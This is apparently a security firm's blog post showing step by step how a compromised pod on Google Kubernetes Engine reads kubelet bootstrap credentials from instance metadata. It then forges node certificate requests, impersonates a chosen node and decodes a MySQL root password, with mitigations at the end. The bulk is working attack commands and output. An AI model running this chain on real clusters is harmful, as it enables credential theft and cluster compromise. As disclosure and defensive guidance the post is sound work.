The kubelet is a critical security boundary in Kubernetes and any successful attack against this component is likely to lead to a wider cluster compromise for most k8s users. In this post we explore how relatively simple it is to exploit the kubelet on Google Kubernetes Engine, in its default configuration.
Introduction
We’re going to discuss attack vectors from inside the GKE cluster. This is obviously important as it assumes an attacker already has some form of control of a container running in your cluster and is able to perform somewhat arbitrary actions within the context of that. Of course, if you’re running a platform that enables the running of customer-defined workloads, you may be in this position by design.
To keep it relatively restricted and real world we’ll use an Alpine Linux container in a pod deployed on a GKE cluster running version 1.9.7-gke.11
which was the default version on GKE at the time of writing. Note that we don’t have root in our container, just to emphasise that we don’t need any special privileges on the container OS for what we’re about to do.
~ $ id
uid=100(app) gid=101(app) groups=101(app)
~ $ pwd
/home/app
Kubelet and its credentials on GKE
The kubelet is a process which runs on each node in your cluster and is responsible for taking PodSpecs from the API Server (primarily) and ensures the containers described are running and healthy on that kubelet’s node.
The kubelet needs to talk to the API server for various reasons including reporting node status. In an RBAC world that means it needs to have credentials. Specifically, the kubelet uses a client certificate with the organization system:nodes
. On the underlying node OS on GKE this is stored under /var/lib/kubelet/pki
but, of course, you don’t have access to this from the containers (unless you’re host-mounting - but you’re not, right?).
How does it get there in the first place though? Like most things “cloud” it comes via instance metadata. GKE supplies an instance attribute called kube-env
. There are three values that are interesting to us as security testers.
KUBELET_CERT
KUBELET_KEY
CA_CERT
Let’s go see if we can access this metadata from our compromised pod.
~ $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_CERT | awk '{print $2}' | base64 -d > kubelet.crt
~ $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_KEY | awk '{print $2}' | base64 -d > kubelet.key
~ $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt
~ $ ls -l
total 12
-rw-r--r-- 1 app app 1115 Nov 29 17:27 apiserver.crt
-rw-r--r-- 1 app app 1050 Nov 29 17:27 kubelet.crt
-rw-r--r-- 1 app app 1679 Nov 29 17:27 kubelet.key
Looking good. Let’s go access the Kubernetes API as the kubelet. $KUBERNETES_PORT_443_TCP_ADDR
is a standard environment variable exposed to all pods giving the IP address of the master.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods --all-namespaces
Error from server (Forbidden): pods is forbidden: User "kubelet" cannot list pods at the cluster scope
Bummer. Why didn’t that work?
Kubelet TLS Bootstrapping
Simplez actually. These credentials are just bootstrapping credentials that allow access to the CertificateSigningRequest
object. The kubelet could also be issued with a token, as seen in kubeadm
but GKE goes with certs. The kubelet uses these bootstrap credentials to submit a certificate signing request (CSR) to the control plane. Use those credentials again but this time, instead of looking for pods, look at the csrs. You’ll see some for your cluster nodes.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests
NAME AGE REQUESTOR CONDITION
node-csr-0eoGCDTP-Q-UYT7KYh-zBB1_3emr4SG43m1XDomxNUI 157m kubelet Approved,Issued
node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM 28m kubelet Approved,Issued
The kube-controller-manager
will, by default, auto-approve certificate signing requests with a common name prefixed with system:nodes:
and issue a client certificate that the kubelet can then use for its normal functions. This is the certificate we want. Let’s grab one.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM -o yaml
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
creationTimestamp: 2018-11-29T17:03:13Z
name: node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM
resourceVersion: "9462"
selfLink: /apis/certificates.k8s.io/v1beta1/certificatesigningrequests/node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM
uid: a879ecdf-f3f8-11e8-a0f7-42010a80009b
spec:
groups:
- system:authenticated
request: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURSBSRVFVRVNULS0tLS0KTUlJQkVUQ0J1QUlCQURCV01SVXdFd1lEVlFRS0V3eHplWE4wWlcwNmJtOWtaWE14UFRBN0JnTlZCQU1UTkhONQpjM1JsYlRwdWIyUmxPbWRyWlMxamJIVnpkR1Z5TVRrdFpHVm1ZWFZzZEMxd2IyOXNMVFpqTnpOaVpXSXhMWGR0CmFETXdXVEFUQmdjcWhrak9QUUlCQmdncWhrak9QUU1CQndOQ0FBVHJaTkFRZDZGUmlvbmRHYWZVNW81NVN3ZSsKMVQ5cVEwTVMxVFQwNEU0SXpvNVdmaHJoZGJjdFNJb0pkd1piLzdkOFNDSWRTekQrancxMDlSOEM3SWsvb0FBdwpDZ1lJS29aSXpqMEVBd0lEU0FBd1JRSWdLK2JvQkdCNnZ6N0tsNk1odjdHdnRpbWgxclZDVUU2VGRpRSs5Vk5kCkRUY0NJUUR6Zy9kUzF3QUpQQkNDMjVkM05JRVVRWURtbERwbkhJdDZBcXA0SHZyQVFRPT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUgUkVRVUVTVC0tLS0tCg==
usages:
- digital signature
- key encipherment
- client auth
username: kubelet
status:
certificate: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUNWVENDQVQyZ0F3SUJBZ0lSQVAyanRSY3JidUtEYjVSUGN5eHlsNEV3RFFZSktvWklodmNOQVFFTEJRQXcKTHpFdE1Dc0dBMVVFQXhNa00yVTVNV00yT1RjdE9HWXpPUzAwTkRRMUxXRXpNR1V0WkRrd1lqUTJNV1JtTURVeApNQjRYRFRFNE1URXlPVEUzTURNeE0xb1hEVEl6TVRFeU9ERTNNRE14TTFvd1ZqRVZNQk1HQTFVRUNoTU1jM2x6CmRHVnRPbTV2WkdWek1UMHdPd1lEVlFRREV6UnplWE4wWlcwNmJtOWtaVHBuYTJVdFkyeDFjM1JsY2pFNUxXUmwKWm1GMWJIUXRjRzl2YkMwMll6Y3pZbVZpTVMxM2JXZ3pNRmt3RXdZSEtvWkl6ajBDQVFZSUtvWkl6ajBEQVFjRApRZ0FFNjJUUUVIZWhVWXFKM1JtbjFPYU9lVXNIdnRVL2FrTkRFdFUwOU9CT0NNNk9WbjRhNFhXM0xVaUtDWGNHClcvKzNmRWdpSFVzdy9vOE5kUFVmQXV5SlA2TVFNQTR3REFZRFZSMFRBUUgvQkFJd0FEQU5CZ2txaGtpRzl3MEIKQVFzRkFBT0NBUUVBVGJ3empsSDU2bmhqMGJHM0xCUzJVYm1QcURIQ2hmazJGdWlCd0xFUmViK2VFeHBmdmFQegpjSTk4bVJFWUdMYURtS0pvanE1UnJFNTR6TGFwaWxDamorUnFMQmpQV1kyY3A1V21pUHErODBGcUc4ZzJvaXNLCldWTVhRQng3RlV3RkFPNjlFcldBTVFwRkIrNXdBc3lhK1BRQVlrNzljdk1SVUlIdHg1aHFjOHkyMmR1T3dFY20KM1BPamdFMHloY1h2SWI3cGdoMm9pS0RIaERxVjUya1NmNTdpYllPUjdQcUFuOTRNZXRYR1FEQmdybDdQK2JONwpna2tUWUo5SGk4TG50Z2ZNSXFHU2lvSDE1dkhSMGhEL09RandzUVJXTzBQd0RZb0IyS2l5djAwVnlJWllPSEpECmJXbmV6QkdXeElqLzVBbXQwUFJwelptekJiUkJ3bm9NYlE9PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
conditions:
- lastUpdateTime: 2018-11-29T17:03:13Z
message: Auto approving kubelet client certificate after SubjectAccessReview.
reason: AutoApproved
type: Approved
Unsurprisingly the certificate is in the status.certificate
field. This is base64 encoded so we’ll decode that.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM -o jsonpath='{.status.certificate}' | base64 -d > node.crt
Awesome. Let’s use it. Note the client-certificate
value has been changed to match the file we output to in the previous command - node.crt
.
~ $ kubectl --client-certificate node.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods
error: tls: private key type does not match public key type
Oh FFS. Now what? Well, the kubelet bootstrap creates a new private key (with the function LoadOrGenerateKeyFile
) before it creates the CSR. It’s almost like they thought of this attack vector. :-)
We can retrieve the certificate but we don’t have the key so we can’t use it. So, we’re stuffed? Nah, of course not. Let’s create our own key, generate a CSR and submit it to the API. :-)
Becoming a node
We can use standard openssl commands to achieve this, then write a manifest to deploy the CSR to the API. If you have a look at that certificate we downloaded, you will see the Subject we need.
~ $ openssl x509 -in node.crt -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
fd:a3:b5:17:2b:6e:e2:83:6f:94:4f:73:2c:72:97:81
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=3e91c697-8f39-4445-a30e-d90b461df051
Validity
Not Before: Nov 29 17:03:13 2018 GMT
Not After : Nov 28 17:03:13 2023 GMT
Subject: O=system:nodes, CN=system:node:gke-cluster19-default-pool-6c73beb1-wmh3
As mentioned above, the organisation is system:nodes
and the common name is system:node:
and then the node name. This is significant and I’ll come back to this later. For now we will use arbitraryname
.
~ $ openssl req -nodes -newkey rsa:2048 -keyout k8shack.key -out k8shack.csr -subj "/O=system:nodes/CN=system:node:arbitraryname"
Generating a RSA private key
..................................+++++
.........................................................+++++
writing new private key to 'k8shack.key'
-----
~ $ ls -lrt
total 8
-rw-r--r-- 1 app app 1704 Nov 29 19:25 k8shack.key
-rw-r--r-- 1 app app 944 Nov 29 19:25 k8shack.csr
Now submit this to the API.
~ $ cat <<EOF | kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} create -f -
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
name: node-csr-$(date +%s)
spec:
groups:
- system:nodes
request: $(cat k8shack.csr | base64 | tr -d '\n')
usages:
- digital signature
- key encipherment
- client auth
EOF
You will hopefully see something like certificatesigningrequest.certificates.k8s.io/node-csr-1543519800 created
. Did it get approved?
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-15435198
00
NAME AGE REQUESTOR CONDITION
node-csr-1543519800 111s kubelet Approved,Issued
Yep! Let’s go grab our certificate like we did before.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-15435198
00 -o jsonpath='{.status.certificate}' | base64 -d > node2.crt
Now let’s use it to access the apiserver.
~ $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP
_ADDR} get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE
gangly-rattlesnake-mysql-master-0 1/1 Running 0 12m 10.32.2.4 gke-cluster19-default-pool-6c73beb1-8cj1 <none>
gangly-rattlesnake-mysql-slave-0 1/1 Running 0 12m 10.32.0.15 gke-cluster19-default-pool-6c73beb1-pf5m <none>
kubeletmein-5464bb8757-kbcfk 1/1 Running 1 71m 10.32.1.6 gke-cluster19-default-pool-6c73beb1-wmh3 <none>
It worked. We now have access to the API as the group system:nodes
. This is pretty useful. We can’t exec into pods, which may be your first thought for a next step, but that’s not a massive limitation, it really depends on our goal. We can certainly schedule pods - that’s the kubelet’s whole purpose - and we can also view secrets.
Stealing secrets
We can’t list them….
~ $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP
_ADDR} get secrets
Error from server (Forbidden): secrets is forbidden: User "system:node:arbitraryname" cannot list secrets in the namespace "default": can only get individual resources of this type
…but that’s a minor inconvenience. We just need to find the secret from the pod spec. That MySQL database looks interesting.
~ $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP
_ADDR} get pod gangly-rattlesnake-mysql-master-0 -o yaml
apiVersion: v1
kind: Pod
[..]
spec:
containers:
- env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
key: mysql-root-password
name: gangly-rattlesnake-mysql
- name: MYSQL_DATABASE
I’ve snipped the above output but the secret name can be seen in the env declaration gangly-rattlesnake-mysql
. Let’s grab it.
~ $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP
_ADDR} get secret gangly-rattlesnake-mysql -o yaml
Error from server (Forbidden): secrets "gangly-rattlesnake-mysql" is forbidden: User "system:node:arbitraryname" cannot get secrets in the namespace "default": no path found to object
Remember I said I’d come back to the node name? Now’s the time. The cluster is running Node Authorization which means RBAC will only let a node see the secrets of pods running on itself. This is great as it means we can place pods according to sensitivity in our cluster and not co-locate pods of different risk. As we’ve tried to access this secret with a made-up node name of arbitraryname
we are not authorised as it’s not on a node of that name.
Dealing with Node Authorization
The solution is simple. Find the node name we need and request a new certificate with the correct node name. Kubernetes does not restrict which nodes can request which certificates.
In the wide output above you can see that the gangly-rattlesnake-mysql-master-0
pod is running on the gke-cluster19-default-pool-6c73beb1-8cj1
node. We need to create a new CSR for this as follows.
~ $ openssl req -nodes -newkey rsa:2048 -keyout k8shack.key -out k8shack.csr -subj "/O=system:nodes/CN=system:node:gke-cluster19-default-pool-6c73be
b1-8cj1"
Then submit it to the API server as before.
cat <<EOF | kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} create -f -
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
name: node-csr-$(date +%s)
spec:
groups:
- system:nodes
request: $(cat k8shack.csr | base64 | tr -d '\n')
usages:
- digital signature
- key encipherment
- client auth
EOF
certificatesigningrequest.certificates.k8s.io/node-csr-1543524743 created
Then retrieve the cert. I’ll output it to the same node2.crt file so I can just arrow up in my shell and rerun my request for the secret.
~ $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_T
CP_ADDR} get csr node-csr-1543524743 -o jsonpath='{.status.certificate}' | base64 -d > node2.crt
Now let’s do this.
~ $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP
_ADDR} get secret gangly-rattlesnake-mysql -o yaml
apiVersion: v1
data:
mysql-replication-password: T1lVRVI3TDE1Zg==
mysql-root-password: OXNSWkRZUnZhRQ==
kind: Secret
metadata:
creationTimestamp: 2018-11-29T20:22:57Z
labels:
app: mysql
chart: mysql-4.2.0
heritage: Tiller
release: gangly-rattlesnake
name: gangly-rattlesnake-mysql
namespace: default
resourceVersion: "24460"
selfLink: /api/v1/namespaces/default/secrets/gangly-rattlesnake-mysql
uid: 8f19d5fd-f414-11e8-a0f7-42010a80009b
type: Opaque
The secret is base64 encoded, so let’s finish that off.
~ $ echo -n OXNSWkRZUnZhRQ== | base64 -d
9sRZDYRvaE
From here obviously we could connect to the MySQL database and potentially dump out sensitive data. This post is long enough as it is so I’ll leave that as an exercise for the reader. :-)
To simplify the process of generating certs, we’ve created a tool called kubeletmein
. More details can be found in our blog post.
Mitigations
Hopefully you can see how important it is to protect the kubelet credentials. Given how important they are, it surprises many of our clients how easy they are to get. Fortunately, there are steps you can take to mitigate on GKE and indeed, the whole topic of bootstrapping kubelets into the cluster is the topic of active work. It’s not just Google that has this problem, as you’ll see in future posts.
Metadata Protection
Starting in Kubernetes v1.9.3, GKE provides the ability to conceal kube-env
(and the instance identity token, more on this in a separate post). At the time of writing there is no option in the Google Cloud console, it has to be parsed via the command line or API.
The command line parameter is --workload-metadata-from-node=SECURE
and more information can be found on Google’s website at https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata#concealment.
From a pod within a cluster with this flag, we now see the following:
~ $ curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env'
This metadata endpoint is concealed.
Needless to say, we highly recommend you configure this on your GKE clusters.
Network Policy
An alternative, and a more universal and robust one, is to implement a Network Policy that denies egress by default then whitelist outbound traffic based on need only. Network Policy is applied to pods, not to the nodes and remember it’s the nodes which need access the API server and metadata, not the pods.
If your application doesn’t need metadata from the cloud environment, just block this outright.
Service Mesh with Egress Gateway
You could implement a service mesh like Istio and enable and configure the Egress Gateway. This will prevent any containers deployed within the service mesh from communicating out to any unauthorised hosts.
Restrict Network Access to Masters
Everything I’ve shown you here has been conducted from inside the cluster however, once you have the initial bootstrap kubelet credentials the rest of the attack could be performed from anywhere with access to the API server. This is obviously easier for the attacker and reduces the time needed inside the environment performing activity that may get detected.
While we are big advocates of the zero trust network approach where VPNs are a thing of the past, many Kubernete’s attacks could be avoided by restricting access to master servers. It requires weighing up the pros and cons of course but if you wanted to do it, on GKE there’s an option under Advanced options -> Network security -> Enable master authorised networks where you can specify valid ranges.
Alternatively, consider a private cluster with public endpoint access disabled and the use of a jumpbox in your VPC to access the API server.
Compute Engine Service Account
The instance attributes are exposed to the compute engine instances that form your worker nodes via the metadata service. However, the instance attributes themselves are configured and readable through the Google Cloud Compute Engine API. Until very recently, GKE gave access to the API scopes from the compute instances by default. I’ll dive in to this a bit more in a separate post but this is an additional, essential step required to ensure a thorough defence against kubelet credential theft.
Summary
That’s it for this post, I hope you’ve found it useful. If you would like some help ensuring that your Kubernetes clusters are well hardened against attack, please get in touch and we’d be happy to help.